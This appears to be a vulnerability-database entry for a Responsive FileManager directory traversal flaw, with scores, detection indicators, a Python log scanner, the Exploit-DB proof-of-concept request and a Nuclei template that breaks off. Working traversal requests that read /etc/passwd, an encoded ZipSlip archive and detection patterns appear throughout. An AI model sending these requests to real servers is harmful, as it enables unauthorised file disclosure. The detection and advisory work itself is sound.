CVE-2018-15535
Published 2018-08-24
Priority P267 · high · 7.5 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Exploit available
EPSS: 45.24% (98.6th percentile)
/filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tecrail | responsive_filemanager | < 9.13.4 | 9.13.4 |
Detection & IOCs
url: /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd
bytes:
UEsDBBQAAAAAALZNmkR7I19kDgAAAA4AAAAmAAAALi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vdG1wL3NvdXJjZS50eHR1cGxvYWRzIGZvbGRlclBLAQIUAxQAAAAAALZNmkR7I19kDgAAAA4AAAAmAAAAAAAAAAAAAAAAtgQAAAAAuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi90bXAvc291cmNlLnR4dFBLBQYAAAAAAQABAFQAAABSAAAAAAA=
- Look for GET requests to /filemanager/ajax_calls.php with parameters action=get_file&sub_action=preview&preview_mode=text and a 'file' parameter containing directory traversal sequences (e.g., ../../../../etc/passwd).
- Monitor POST requests to /filemanager/ajax_calls.php?action=extract with a body containing 'path=<archive_name>'; this triggers ZipSlip-style path traversal during archive extraction.
- Detect HTTP responses to the traversal request that match the pattern 'root:.*:0:0:' in the body, indicating successful /etc/passwd disclosure.
- Flag requests with the X-Requested-With: XMLHttpRequest header targeting /filemanager/ajax_calls.php with traversal sequences ('..') in the 'file' query parameter.
- Inspect uploaded ZIP archives for entries containing '../../' path components (ZipSlip), which can write files outside the intended upload directory.
- The traversal exploit requires no authentication (PR:N) and is network-accessible, meaning any unauthenticated user can trigger it if the filemanager endpoint is exposed.
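
The get_file checks in the list above, written as log-scanning logic. This is an added example, not code from the advisory or the Responsive FileManager project; it goes beyond the literal `../` form by also catching percent-encoded, double-encoded and backslash variants. It assumes Combined Log Format, and the sample log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

ENDPOINT = "/filemanager/ajax_calls.php"
# Request field of a Combined Log Format line: "METHOD target HTTP/x.y" (assumed format)
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded '..' (%252e%252e) is seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_traversal(value):
    """True if any path segment of the decoded value is exactly '..'."""
    return ".." in re.split(r"[\\/]", fully_decode(value))

def is_cve_2018_15535_probe(log_line):
    """Flag get_file requests to ajax_calls.php whose 'file' parameter climbs upward."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    url = urlsplit(m.group("target"))
    if not fully_decode(url.path).lower().endswith(ENDPOINT):
        return False
    params = parse_qs(url.query, keep_blank_values=True)
    if "get_file" not in params.get("action", []):
        return False
    return any(has_traversal(v) for v in params.get("file", []))

# Constructed sample access-log lines (not taken from a real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [27/Aug/2018:10:01:02 +0000] "GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1" 200 1432',
    '198.51.100.7 - - [27/Aug/2018:10:01:09 +0000] "GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1432',
    '203.0.113.20 - - [27/Aug/2018:10:02:30 +0000] "GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&file=notes/release..v2.txt HTTP/1.1" 200 311',
    '203.0.113.20 - - [27/Aug/2018:10:03:00 +0000] "GET /filemanager/dialog.php?type=0&popup=1 HTTP/1.1" 200 9120',
]

def scan(lines):
    """Return the log lines that match the traversal pattern."""
    return [line for line in lines if is_cve_2018_15535_probe(line)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("ALERT", hit)
```

Matching on whole `..` path segments rather than the substring `..` keeps legitimate names such as `release..v2.txt` from raising alerts.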
CVSS provenance
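| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 7.5 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |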
No detection rules found.
Exploit-DB
Responsive FileManager < 9.13.4 - Directory Traversal
exploitdb·2018-08-27·CVSS 7.5
CVE-2018-15536 [HIGH] Responsive FileManager < 9.13.4 - Directory Traversal
---
The following vulnerabilities were fixed in the version 9.13.4.
https://responsivefilemanager.com
#1 Path Traversal Allows to Read Any File
Reserved CVE: CVE-2018-15535
Discovered By: Simon Uvarov
Vendor Status: Fixed
Details:
The following request allows a user to read any file on the system.
```
GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1
Host: 192.168.5.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.129/filemanager/dialog.php?type=0&popup=1
X-Requested-With: XMLHttpRequest
Cookie: last_posit
```
Nuclei
Responsive FileManager <9.13.4 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2018-15535 [HIGH] Responsive FileManager <9.13.4 - Local File Inclusion
Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion.
Template:
```yaml
id: CVE-2018-15535

info:
  name: Responsive FileManager <9.13.4 - Local File Inclusion
  author: daffainfo
  severity: high
  description: Responsive FileManager before version 9.13.4 is vulnerable to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory, aka local file inclusion.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unau
```